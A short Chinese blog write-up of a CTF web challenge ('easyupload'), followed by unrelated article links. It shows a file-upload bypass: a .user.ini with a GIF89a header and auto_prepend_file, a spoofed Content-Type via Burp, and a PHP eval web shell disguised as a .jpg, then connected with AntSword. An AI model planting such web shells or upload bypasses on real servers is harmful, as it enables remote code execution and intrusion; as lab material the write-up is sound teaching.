攻防世界-WEB-easyupload

Lucifer_wei2023-09-17 10:53

1.新建.user.ini文件,内容如下

GIF89a

auto_prepend_file=a.jpg

2.上传该文件,并用burp抓包,将Content-Type: application/octet-stream修改为

Content-Type: image/jpg

3.放包,结果如下

  1. 新建a.txt文件,内容为

GIF89a

<?=eval($_REQUEST'cmd');?>

保存后将文件后缀修改为.jpg

5.直接上传该文件即可成功上传

PS:按F12打开调试器选择网络查看上传文件的地址

如图所示上传地址为:****/uploads/index.php

6.直接蚁剑连接

7.结果如下

8.查找flag

相关推荐
这个DBA有点耶2 天前
多模融合数据库深度解析:关系、文档、向量、图如何统一?
数据库·自然语言处理·aigc·dba·改行学it
这个DBA有点耶3 天前
SQL中的窗口函数进阶:滑动窗口与帧子句详解
数据库·sql·程序人生·mysql·oracle·学习方法·改行学it
这个DBA有点耶4 天前
SQL语义执行:当数据库开始“理解”你的查询意图
数据库·sql·自然语言处理·创业创新·dba·程序员创富·改行学it
Roselind_Yi10 天前
【快速熟悉容器】企业 Docker 从 0 到落地全流程(分角色版)
java·运维·redis·docker·容器·json·改行学it
这个DBA有点耶10 天前
COUNT进阶:超大表的近似计数与HyperLogLog
数据库·sql·程序人生·学习方法·dba·改行学it
一个王同学13 天前
从零到一 | CV转多模态大模型 | week09 | Minillava Refactor结合手搓和llava源码深入理解多模态大模型原理
人工智能·深度学习·机器学习·计算机视觉·改行学it
这个DBA有点耶17 天前
MySQL深分页优化:从LIMIT 1000000,10到毫秒级响应的三种写法
数据库·程序人生·mysql·性能优化·学习方法·dba·改行学it
Sherlock Ma17 天前
西瓜书《机器学习》全网最详细解读 第一章:绪论
人工智能·深度学习·考研·机器学习·学习方法·西瓜书·改行学it
黄昏回响19 天前
信息系统基础知识(五):专家系统(ES)详解
程序人生·自动化·软件工程·改行学it
黄昏回响20 天前
信息系统基础知识(六):办公自动化系统(OAS)详解
计算机网络·程序人生·面试·自动化·改行学it
热门推荐
01GitHub 镜像站点02【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法03【AI】2026 年具身智能模型和世界模型总结04DeepSeek V4 + Claude Code thinking mode 400 错误修复方案05Codex 接入 DeepSeek API 完整配置文档06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07CC-Switch & Claude 基于 Linux 服务器安装使用指南08几个好用的ip纯净度检测网站09API Key 登录 Codex 也能用插件了,还支持会话删除和导出10CC-Switch 全平台下载、安装与使用全指南(Windows/macOS/Linux)